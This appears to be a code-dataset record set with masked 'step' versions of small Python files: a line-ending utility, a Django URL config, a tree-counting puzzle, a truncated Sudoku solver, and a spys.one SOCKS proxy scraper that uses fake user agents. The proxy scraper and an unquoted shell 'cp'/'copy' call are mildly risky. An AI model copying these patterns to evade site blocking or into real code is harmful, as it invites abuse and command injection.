"step-4": "from __future__ import print_function\nimport os\nimport sys\nfrom dkfileutils.path import Path\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n if source == dest:\n return dest\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = ''\n if sys.platform == 'win32':\n if force:\n flags += ' /Y'\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else:\n if force:\n flags += ' --force'\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\n\nfrom dkfileutils.path import Path\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n # print \"COPY:\", locals()\n # print \"COPY:\", ctx.force, ctx.verbose\n if source == dest:\n return dest\n\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = \"\"\n if sys.platform == 'win32':\n if force:\n flags += \" /Y\"\n # print 'copy {flags} {source} {dest}'.format(**locals())\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else: # pragma: nocover\n if force:\n flags += \" --force\"\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False) # noqa\n placement = Path(dest).dirname()\n placement.makedirs()\n\n with open(dest, 'w') as out:\n print(\"Opened:\", dest, \"for writing.\")\n for s in sources:\n with open(s, 'r') as inp:\n print(\" appending:\", s)\n out.writelines(inp.readlines())\n out.write('\\n')\n\n # flags = \"\"\n # if sys.platform == 'win32':\n # if force:\n # flags += \" /Y\"\n # source = '+'.join(sources)\n # source = source.replace('/', '\\\\')\n # ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n # else: # pragma: nocover\n # if force:\n # pass\n # # flags += \" --force\"\n # source = ' '.join(sources)\n # # print 'cat {flags} {source} > {dest}'.format(**locals())\n # ctx.run('cat {flags} {source} > {dest}'.format(**locals()))\n\n fix_line_endings(dest)\n # if len(line_endings(dest)) > 1:\n # fix_line_endings(dest)\n\n return dest\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
x = "Programming is like building a multilingual puzzle\n"
print (x)
|
normal
|
{
"blob_id": "95c0ba757b7561ef6cc0ad312034e2695f8420c3",
"index": 3933,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(x)\n",
"step-3": "x = 'Programming is like building a multilingual puzzle\\n'\nprint(x)\n",
"step-4": "#!/usr/bin/env python3\n\nx = \"Programming is like building a multilingual puzzle\\n\"\n\n\nprint (x)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_request_key(session):
res = session.post('https://spys.one/en/socks-proxy-list/')
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find('input', {'name': 'xx0'}).get('value')
<|reserved_special_token_0|>
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
res = session.post('https://spys.one/en/socks-proxy-list/')
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find('input', {'name': 'xx0'}).get('value')
def _get_proxy_list(session, xx0):
res = session.post('https://spys.one/en/socks-proxy-list/', data=
f'xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}', headers={
'Content-Type': 'application/x-www-form-urlencoded'})
soup = BeautifulSoup(res.text, 'html.parser')
js = js2py.EvalJs({'document': {'write': lambda a: a}})
js.execute(soup.select_one('body > script').string)
addrs = soup.select('tr[onmouseover] > td:first-child')
ports = [js.eval(i.find('script').string) for i in addrs]
addrs = [i.get_text() for i in addrs]
ports = [re.sub('<[^<]*>', '', i) for i in ports]
return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
res = session.post("https://spys.one/en/socks-proxy-list/")
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find("input", {"name": "xx0"}).get("value")
def _get_proxy_list(session, xx0):
res = session.post("https://spys.one/en/socks-proxy-list/",
data=f"xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}",
headers={
"Content-Type": "application/x-www-form-urlencoded",
})
soup = BeautifulSoup(res.text, 'html.parser')
js = js2py.EvalJs({"document": {"write": lambda a: a}})
js.execute(soup.select_one("body > script").string)
addrs = soup.select("tr[onmouseover] > td:first-child")
ports = [js.eval(i.find("script").string) for i in addrs]
addrs = [i.get_text() for i in addrs]
ports = [re.sub(r"<[^<]*>", "", i) for i in ports]
return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers["User-Agent"] = UserAgent().random
print("Rotating proxy list")
xx0 = _get_request_key(session)
print(f"Got proxy request key xx0={xx0}")
addrs = _get_proxy_list(session, xx0)
self._proxies = [f"socks5://{i}" for i in addrs]
print(f"Got {len(self._proxies)} proxies")
def random(self):
assert(len(self._proxies) > 0)
return random.choice(self._proxies)
|
flexible
|
{
"blob_id": "647dde6e3288ded29336062b78baacc3a92908a7",
"index": 478,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ProxyScrapper:\n\n def __init__(self):\n self._proxies = []\n\n def refresh(self):\n session = requests.Session()\n session.headers['User-Agent'] = UserAgent().random\n print('Rotating proxy list')\n xx0 = _get_request_key(session)\n print(f'Got proxy request key xx0={xx0}')\n addrs = _get_proxy_list(session, xx0)\n self._proxies = [f'socks5://{i}' for i in addrs]\n print(f'Got {len(self._proxies)} proxies')\n\n def random(self):\n assert len(self._proxies) > 0\n return random.choice(self._proxies)\n",
"step-3": "<mask token>\n\n\ndef _get_request_key(session):\n res = session.post('https://spys.one/en/socks-proxy-list/')\n soup = BeautifulSoup(res.text, 'html.parser')\n return soup.find('input', {'name': 'xx0'}).get('value')\n\n\n<mask token>\n\n\nclass ProxyScrapper:\n\n def __init__(self):\n self._proxies = []\n\n def refresh(self):\n session = requests.Session()\n session.headers['User-Agent'] = UserAgent().random\n print('Rotating proxy list')\n xx0 = _get_request_key(session)\n print(f'Got proxy request key xx0={xx0}')\n addrs = _get_proxy_list(session, xx0)\n self._proxies = [f'socks5://{i}' for i in addrs]\n print(f'Got {len(self._proxies)} proxies')\n\n def random(self):\n assert len(self._proxies) > 0\n return random.choice(self._proxies)\n",
"step-4": "import re\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport js2py\nfrom fake_useragent import UserAgent\n\n\ndef _get_request_key(session):\n res = session.post('https://spys.one/en/socks-proxy-list/')\n soup = BeautifulSoup(res.text, 'html.parser')\n return soup.find('input', {'name': 'xx0'}).get('value')\n\n\ndef _get_proxy_list(session, xx0):\n res = session.post('https://spys.one/en/socks-proxy-list/', data=\n f'xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}', headers={\n 'Content-Type': 'application/x-www-form-urlencoded'})\n soup = BeautifulSoup(res.text, 'html.parser')\n js = js2py.EvalJs({'document': {'write': lambda a: a}})\n js.execute(soup.select_one('body > script').string)\n addrs = soup.select('tr[onmouseover] > td:first-child')\n ports = [js.eval(i.find('script').string) for i in addrs]\n addrs = [i.get_text() for i in addrs]\n ports = [re.sub('<[^<]*>', '', i) for i in ports]\n return list(map(''.join, zip(addrs, ports)))\n\n\nclass ProxyScrapper:\n\n def __init__(self):\n self._proxies = []\n\n def refresh(self):\n session = requests.Session()\n session.headers['User-Agent'] = UserAgent().random\n print('Rotating proxy list')\n xx0 = _get_request_key(session)\n print(f'Got proxy request key xx0={xx0}')\n addrs = _get_proxy_list(session, xx0)\n self._proxies = [f'socks5://{i}' for i in addrs]\n print(f'Got {len(self._proxies)} proxies')\n\n def random(self):\n assert len(self._proxies) > 0\n return random.choice(self._proxies)\n",
"step-5": "import re\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport js2py\nfrom fake_useragent import UserAgent\n\n\ndef _get_request_key(session):\n res = session.post(\"https://spys.one/en/socks-proxy-list/\")\n soup = BeautifulSoup(res.text, 'html.parser')\n return soup.find(\"input\", {\"name\": \"xx0\"}).get(\"value\")\n\n\ndef _get_proxy_list(session, xx0):\n res = session.post(\"https://spys.one/en/socks-proxy-list/\",\n data=f\"xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}\",\n headers={\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n })\n\n soup = BeautifulSoup(res.text, 'html.parser')\n js = js2py.EvalJs({\"document\": {\"write\": lambda a: a}})\n js.execute(soup.select_one(\"body > script\").string)\n\n addrs = soup.select(\"tr[onmouseover] > td:first-child\")\n ports = [js.eval(i.find(\"script\").string) for i in addrs]\n addrs = [i.get_text() for i in addrs]\n ports = [re.sub(r\"<[^<]*>\", \"\", i) for i in ports]\n\n return list(map(''.join, zip(addrs, ports)))\n\n\nclass ProxyScrapper:\n def __init__(self):\n self._proxies = []\n\n def refresh(self):\n session = requests.Session()\n session.headers[\"User-Agent\"] = UserAgent().random\n print(\"Rotating proxy list\")\n\n xx0 = _get_request_key(session)\n print(f\"Got proxy request key xx0={xx0}\")\n\n addrs = _get_proxy_list(session, xx0)\n self._proxies = [f\"socks5://{i}\" for i in addrs]\n print(f\"Got {len(self._proxies)} proxies\")\n\n def random(self):\n assert(len(self._proxies) > 0)\n return random.choice(self._proxies)\n",
"step-ids": [
0,
4,
5,
7,
8
]
}
|
[
0,
4,
5,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('register/', RegisterUserAPIView.as_view()), path(
'get/token/', GetToken.as_view()), path('card/list/', ShowCardsAPIView.
as_view()), path('card/create/', CreateCardAPIView.as_view()), path(
'card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()), path(
'card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()), path(
'card/<int:pk>/delete/', DeleteCardAPIView.as_view()), path(
'card/<int:pk>/update/', UpdateCardAPIView.as_view()), path('card/get/',
GetCardSListAPIView.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from .authentication import GetToken, RegisterUserAPIView
from .resurses import *
urlpatterns = [path('register/', RegisterUserAPIView.as_view()), path(
'get/token/', GetToken.as_view()), path('card/list/', ShowCardsAPIView.
as_view()), path('card/create/', CreateCardAPIView.as_view()), path(
'card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()), path(
'card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()), path(
'card/<int:pk>/delete/', DeleteCardAPIView.as_view()), path(
'card/<int:pk>/update/', UpdateCardAPIView.as_view()), path('card/get/',
GetCardSListAPIView.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from .authentication import GetToken, RegisterUserAPIView
from .resurses import *
urlpatterns = [
path('register/', RegisterUserAPIView.as_view()),
path('get/token/', GetToken.as_view()),
path('card/list/', ShowCardsAPIView.as_view()),
path('card/create/', CreateCardAPIView.as_view()),
path('card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()),
path('card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()),
path('card/<int:pk>/delete/', DeleteCardAPIView.as_view()),
path('card/<int:pk>/update/', UpdateCardAPIView.as_view()),
path('card/get/', GetCardSListAPIView.as_view()),
]
|
flexible
|
{
"blob_id": "aac334256c1e05ef33a54da19925911af6645a10",
"index": 9529,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('register/', RegisterUserAPIView.as_view()), path(\n 'get/token/', GetToken.as_view()), path('card/list/', ShowCardsAPIView.\n as_view()), path('card/create/', CreateCardAPIView.as_view()), path(\n 'card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()), path(\n 'card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()), path(\n 'card/<int:pk>/delete/', DeleteCardAPIView.as_view()), path(\n 'card/<int:pk>/update/', UpdateCardAPIView.as_view()), path('card/get/',\n GetCardSListAPIView.as_view())]\n",
"step-3": "from django.urls import path\nfrom .authentication import GetToken, RegisterUserAPIView\nfrom .resurses import *\nurlpatterns = [path('register/', RegisterUserAPIView.as_view()), path(\n 'get/token/', GetToken.as_view()), path('card/list/', ShowCardsAPIView.\n as_view()), path('card/create/', CreateCardAPIView.as_view()), path(\n 'card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()), path(\n 'card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()), path(\n 'card/<int:pk>/delete/', DeleteCardAPIView.as_view()), path(\n 'card/<int:pk>/update/', UpdateCardAPIView.as_view()), path('card/get/',\n GetCardSListAPIView.as_view())]\n",
"step-4": "from django.urls import path\n\nfrom .authentication import GetToken, RegisterUserAPIView\nfrom .resurses import *\n\nurlpatterns = [\n path('register/', RegisterUserAPIView.as_view()),\n path('get/token/', GetToken.as_view()),\n path('card/list/', ShowCardsAPIView.as_view()),\n path('card/create/', CreateCardAPIView.as_view()),\n path('card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()),\n path('card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()),\n path('card/<int:pk>/delete/', DeleteCardAPIView.as_view()),\n path('card/<int:pk>/update/', UpdateCardAPIView.as_view()),\n path('card/get/', GetCardSListAPIView.as_view()),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
with open('input_trees.txt') as file:
map = file.readlines()
map = [line.strip() for line in map]
<|reserved_special_token_0|>
for slope in slopes:
treeCount = 0
row, column = 0, 0
while row + 1 < len(map):
row += slope[1]
column += slope[0]
space = map[row][column % len(map[row])]
if space == '#':
treeCount += 1
total *= treeCount
print(total)
<|reserved_special_token_1|>
with open('input_trees.txt') as file:
map = file.readlines()
map = [line.strip() for line in map]
slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]
total = 1
for slope in slopes:
treeCount = 0
row, column = 0, 0
while row + 1 < len(map):
row += slope[1]
column += slope[0]
space = map[row][column % len(map[row])]
if space == '#':
treeCount += 1
total *= treeCount
print(total)
<|reserved_special_token_1|>
with open("input_trees.txt") as file:
map = file.readlines()
map = [ line.strip() for line in map ]
slopes = [(1,1), (3,1), (5,1), (7,1),(1,2)]
total = 1
for slope in slopes:
treeCount = 0
row, column = 0, 0
while row + 1 < len(map):
row += slope[1]
column += slope[0]
space = map[row][column % len(map[row])]
if space == "#":
treeCount += 1
total *= treeCount
print(total)
|
flexible
|
{
"blob_id": "685fa78b9c3ec141ce1e9ab568e4ad8a0565d596",
"index": 4285,
"step-1": "<mask token>\n",
"step-2": "with open('input_trees.txt') as file:\n map = file.readlines()\n map = [line.strip() for line in map]\n<mask token>\nfor slope in slopes:\n treeCount = 0\n row, column = 0, 0\n while row + 1 < len(map):\n row += slope[1]\n column += slope[0]\n space = map[row][column % len(map[row])]\n if space == '#':\n treeCount += 1\n total *= treeCount\nprint(total)\n",
"step-3": "with open('input_trees.txt') as file:\n map = file.readlines()\n map = [line.strip() for line in map]\nslopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\ntotal = 1\nfor slope in slopes:\n treeCount = 0\n row, column = 0, 0\n while row + 1 < len(map):\n row += slope[1]\n column += slope[0]\n space = map[row][column % len(map[row])]\n if space == '#':\n treeCount += 1\n total *= treeCount\nprint(total)\n",
"step-4": "with open(\"input_trees.txt\") as file:\n map = file.readlines()\n map = [ line.strip() for line in map ]\n\nslopes = [(1,1), (3,1), (5,1), (7,1),(1,2)]\n\ntotal = 1\n\nfor slope in slopes:\n treeCount = 0\n row, column = 0, 0\n\n while row + 1 < len(map):\n row += slope[1]\n column += slope[0]\n\n space = map[row][column % len(map[row])]\n if space == \"#\":\n treeCount += 1\n\n total *= treeCount\n\nprint(total)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from pprint import pprint
from collections import Counter
from copy import deepcopy
class Sudoku():
def __init__(self, grid):
'''
Initializes the grid
'''
self.grid = grid
self.sub_grid = self.create_sub_grid(self.grid)
def create_sub_grid(self, grid):
'''
Creates a Sub grid, containing the possible numbers within a cell
Returns a Sub grid
'''
sub_grid = []
for i in range(9):
sub = []
for j in range(9):
if grid[i][j] == 0:
sub.append(self.missing_numbers(i,j))
else:
sub.append([grid[i][j]])
sub_grid.append(sub)
del sub
return sub_grid
def missing_numbers(self, row, column):
'''
Returs the possible set of numbers of a particular row and column
'''
rrow, ccolumn = self.row_and_column(self.grid, row, column)
cell = self.cell_3by3(row, column)
missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn + cell))
return missing_num
def cell_3by3(self, row, column):
'''
Returns grid of 3 X 3
'''
cell = []
a = row // 3
b = column // 3
for i in range(9):
for j in range(9):
if i // 3 == a and j // 3 == b :
cell.append(grid[i][j])
return cell
def row_and_column(self, grid, row, column):
'''
Returns rows and columns
'''
r = grid[row]
c = []
for j in range(9):
c.append(grid[j][column])
return r, c
def step_1(self, sub_grid, num):
'''
Reducing a list of clues to a single value based on row and column elimination
Returns a refined sub grid
'''
row,column = self.row_and_column(sub_grid,num,num)
row_flatten = sum(row,[])
single_values = [i for i,j in Counter(row_flatten).items() if j == 1 ]
# For Rows
for i in range(len(sub_grid)):
for j in single_values:
if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:
sub_grid[num][i] = [j]
# For Columns
column_flatten = sum(column, [])
column_single_values = [i for i,j in Counter(column_flatten).items() if j == 1 ]
for i in range(len(sub_grid)):
for j in column_single_values:
if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:
sub_grid[i][num] = [j]
return sub_grid
def step_2(self, sub_grid, num):
'''
Removes a number 'n' that fits at its correct position from other lists corresponding its row and column
Returns refined sub grid
'''
row,column = self.row_and_column(sub_grid,num,num)
# For Rows
single_value_list = []
for i in range(len(row)):
if len(sub_grid[num][i]) == 1:
single_value_list.append(sub_grid[num][i])
single_value_list_flatten = sum(single_value_list, [])
for i in range(len(sub_grid)):
if len(sub_grid[num][i]) != 1:
for j in single_value_list_flatten:
if j in sub_grid[num][i]:
sub_grid[num][i].remove(j)
# For Columns
single_value_list = []
for i in range(len(column)):
if len(sub_grid[i][num]) == 1:
single_value_list.append(sub_grid[i][num])
single_value_list_flatten = sum(single_value_list, [])
for i in range(len(sub_grid)):
if len(sub_grid[i][num]) != 1:
for j in single_value_list_flatten:
if j in sub_grid[i][num]:
sub_grid[i][num].remove(j)
return sub_grid
def step_3(self, sub_grid, num):
pass
def perform(self):
'''
Performs the step_1 and step_2 untill the Sub grid is solved
Returns None
'''
temp = []
while self.sub_grid != temp:
temp = deepcopy(self.sub_grid)
for i in range(len(grid)):
self.sub_grid = self.step_1(self.sub_grid, i)
self.sub_grid = self.step_2(self.sub_grid, i)
def solve(self):
'''
Solves the Sub grid and prints the sub grid
Returns None
'''
self.perform()
for i in range(9):
for j in range(9):
print(self.sub_grid[i][j], end=' ')
print()
# grid = [
# [0,3,0,0,1,0,0,6,0],
# [7,5,0,0,3,0,0,4,8],
# [0,0,6,9,8,4,3,0,0],
# [0,0,3,0,0,0,8,0,0],
# [9,1,2,0,0,0,6,7,4],
# [0,0,4,0,0,0,5,0,0],
# [0,0,1,6,7,5,2,0,0],
# [6,8,0,0,9,0,0,1,5],
# [0,9,0,0,4,0,0,3,0]
# ]
# grid = [
# [6,0,0,1,0,8,2,0,3],
# [0,2,0,0,4,0,0,9,0],
# [8,0,3,0,0,5,4,0,0],
# [5,0,4,6,0,7,0,0,9],
# [0,3,0,0,0,0,0,5,0],
# [7,0,0,8,0,3,1,0,2],
# [0,0,1,7,0,0,9,0,6],
# [0,8,0,0,3,0,0,2,0],
# [3,0,2,9,0,4,0,0,5]
# ]
grid = [
[8,0,6,0,0,0,4,0,9],
[0,0,0,0,0,0,0,0,0],
[0,9,2,0,0,0,5,0,8],
[0,0,9,0,7,1,3,0,0],
[5,0,8,0,0,0,0,2,0],
[0,0,4,0,5,0,0,0,0],
[0,0,0,0,0,7,9,1,0],
[0,0,0,9,0,0,0,0,7],
[0,7,0,0,0,3,0,0,4],
]
mat = Sudoku(grid)
mat.solve()
|
normal
|
{
"blob_id": "4032503bba8a1dd273015d503f52b6ea2d932d1d",
"index": 3564,
"step-1": "<mask token>\n\n\nclass Sudoku:\n\n def __init__(self, grid):\n \"\"\"\n Initializes the grid\n \"\"\"\n self.grid = grid\n self.sub_grid = self.create_sub_grid(self.grid)\n\n def create_sub_grid(self, grid):\n \"\"\" \n Creates a Sub grid, containing the possible numbers within a cell\n Returns a Sub grid\n \"\"\"\n sub_grid = []\n for i in range(9):\n sub = []\n for j in range(9):\n if grid[i][j] == 0:\n sub.append(self.missing_numbers(i, j))\n else:\n sub.append([grid[i][j]])\n sub_grid.append(sub)\n del sub\n return sub_grid\n\n def missing_numbers(self, row, column):\n \"\"\"\n Returs the possible set of numbers of a particular row and column\n \"\"\"\n rrow, ccolumn = self.row_and_column(self.grid, row, column)\n cell = self.cell_3by3(row, column)\n missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn +\n cell))\n return missing_num\n\n def cell_3by3(self, row, column):\n \"\"\"\n Returns grid of 3 X 3\n \"\"\"\n cell = []\n a = row // 3\n b = column // 3\n for i in range(9):\n for j in range(9):\n if i // 3 == a and j // 3 == b:\n cell.append(grid[i][j])\n return cell\n\n def row_and_column(self, grid, row, column):\n \"\"\"\n Returns rows and columns\n \"\"\"\n r = grid[row]\n c = []\n for j in range(9):\n c.append(grid[j][column])\n return r, c\n\n def step_1(self, sub_grid, num):\n \"\"\"\n Reducing a list of clues to a single value based on row and column elimination\n Returns a refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n row_flatten = sum(row, [])\n single_values = [i for i, j in Counter(row_flatten).items() if j == 1]\n for i in range(len(sub_grid)):\n for j in single_values:\n if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:\n sub_grid[num][i] = [j]\n column_flatten = sum(column, [])\n column_single_values = [i for i, j in Counter(column_flatten).items\n () if j == 1]\n for i in range(len(sub_grid)):\n for j in column_single_values:\n if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:\n sub_grid[i][num] = [j]\n return sub_grid\n <mask token>\n\n def step_3(self, sub_grid, num):\n pass\n\n def perform(self):\n \"\"\"\n Performs the step_1 and step_2 untill the Sub grid is solved\n Returns None\n \"\"\"\n temp = []\n while self.sub_grid != temp:\n temp = deepcopy(self.sub_grid)\n for i in range(len(grid)):\n self.sub_grid = self.step_1(self.sub_grid, i)\n self.sub_grid = self.step_2(self.sub_grid, i)\n\n def solve(self):\n \"\"\"\n Solves the Sub grid and prints the sub grid\n Returns None\n \"\"\"\n self.perform()\n for i in range(9):\n for j in range(9):\n print(self.sub_grid[i][j], end=' ')\n print()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Sudoku:\n\n def __init__(self, grid):\n \"\"\"\n Initializes the grid\n \"\"\"\n self.grid = grid\n self.sub_grid = self.create_sub_grid(self.grid)\n\n def create_sub_grid(self, grid):\n \"\"\" \n Creates a Sub grid, containing the possible numbers within a cell\n Returns a Sub grid\n \"\"\"\n sub_grid = []\n for i in range(9):\n sub = []\n for j in range(9):\n if grid[i][j] == 0:\n sub.append(self.missing_numbers(i, j))\n else:\n sub.append([grid[i][j]])\n sub_grid.append(sub)\n del sub\n return sub_grid\n\n def missing_numbers(self, row, column):\n \"\"\"\n Returs the possible set of numbers of a particular row and column\n \"\"\"\n rrow, ccolumn = self.row_and_column(self.grid, row, column)\n cell = self.cell_3by3(row, column)\n missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn +\n cell))\n return missing_num\n\n def cell_3by3(self, row, column):\n \"\"\"\n Returns grid of 3 X 3\n \"\"\"\n cell = []\n a = row // 3\n b = column // 3\n for i in range(9):\n for j in range(9):\n if i // 3 == a and j // 3 == b:\n cell.append(grid[i][j])\n return cell\n\n def row_and_column(self, grid, row, column):\n \"\"\"\n Returns rows and columns\n \"\"\"\n r = grid[row]\n c = []\n for j in range(9):\n c.append(grid[j][column])\n return r, c\n\n def step_1(self, sub_grid, num):\n \"\"\"\n Reducing a list of clues to a single value based on row and column elimination\n Returns a refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n row_flatten = sum(row, [])\n single_values = [i for i, j in Counter(row_flatten).items() if j == 1]\n for i in range(len(sub_grid)):\n for j in single_values:\n if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:\n sub_grid[num][i] = [j]\n column_flatten = sum(column, [])\n column_single_values = [i for i, j in Counter(column_flatten).items\n () if j == 1]\n for i in range(len(sub_grid)):\n for j in column_single_values:\n if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:\n sub_grid[i][num] = [j]\n return sub_grid\n\n def step_2(self, sub_grid, num):\n \"\"\"\n Removes a number 'n' that fits at its correct position from other lists corresponding its row and column\n Returns refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n single_value_list = []\n for i in range(len(row)):\n if len(sub_grid[num][i]) == 1:\n single_value_list.append(sub_grid[num][i])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[num][i]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[num][i]:\n sub_grid[num][i].remove(j)\n single_value_list = []\n for i in range(len(column)):\n if len(sub_grid[i][num]) == 1:\n single_value_list.append(sub_grid[i][num])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[i][num]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[i][num]:\n sub_grid[i][num].remove(j)\n return sub_grid\n\n def step_3(self, sub_grid, num):\n pass\n\n def perform(self):\n \"\"\"\n Performs the step_1 and step_2 untill the Sub grid is solved\n Returns None\n \"\"\"\n temp = []\n while self.sub_grid != temp:\n temp = deepcopy(self.sub_grid)\n for i in range(len(grid)):\n self.sub_grid = self.step_1(self.sub_grid, i)\n self.sub_grid = self.step_2(self.sub_grid, 